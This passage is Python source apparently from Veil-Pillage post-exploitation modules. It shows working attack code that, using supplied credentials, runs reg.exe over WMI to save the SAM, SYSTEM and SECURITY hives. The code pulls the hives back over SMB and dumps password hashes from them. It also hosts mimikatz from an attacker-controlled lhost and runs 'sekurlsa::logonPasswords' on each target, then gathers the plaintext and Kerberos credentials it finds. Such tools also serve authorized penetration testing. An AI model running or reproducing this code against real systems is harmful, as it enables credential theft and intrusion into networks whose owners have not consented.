self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" else: # do reg.exe for hashdump and host/execute for mimikatz print helpers.color("\n [!] Powershell not installed on " + target, warning=True) print helpers.color( "\n [*] Using reg.exe save method for hash dumping on " + target) self.output += "[!] Powershell not installed on " + target + "\n" # reg.exe command to save off the hives regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y" # execute the registry save command command_methods.executeCommand(target, username, password, regSaveCommand, "wmis") print helpers.color("\n [*] Dumping hashes on " + target) # sleep for 5 seconds to let everything backup time.sleep(5) # grab all of the backed up files systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False) securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False) samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False) # more error-checking here? if systemFile == "": self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/system', 'w') f.write(systemFile) f.close() if securityFile == "": self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/security', 'w') f.write(securityFile) f.close() if samFile == "": self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/sam', 'w') f.write(samFile) f.close() # get all the hashes from these hives out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam") # save the output file off saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out) self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n" # save these off to the universal list hashes = helpers.parseHashdump(out) allhashes.extend(hashes) # now, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult( target, username, password, archCommand, "wmis") arch = "x86" if "64" in archResult: arch = "x64" # now time for ze mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file # host mimikatz.exe and trigger it ONLY on this particular machine # so we can get the architecture correct delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" if len(allhashes) > 0: allhashes = sorted(set(allhashes)) self.output += "[*] All unique hashes:\n\t" + "\n\t".join( allhashes) + "\n" if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join( allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join( allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] lhost = self.required_options["lhost"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # the temporary output file gpp-password will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # let's keep track of ALL plaintext credentials found allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [] for target in self.targets: print "\n [*] Executing mimikatz on "+target # first, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod) # if there's a failure in this initial execution, go to the next target if "error" in archResult: self.output += "[!] Mimikatz failed for "+target+" : "+archResult+"\n" continue arch = "x86" if "64" in archResult: arch = "x64" exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file # now time for mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz"+arch+".exe" # host the arch-correct mimikatz.exe and trigger it with the appropriate arguments delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs) print "\n [*] Waiting "+delay+"s for Mimikatz to run..." time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += "[*] Mimikatz results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] Mimikatz failed using creds '"+username+":"+password+"' on "+target+" : no result file\n" # append the total mimikatz creds if we have any if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"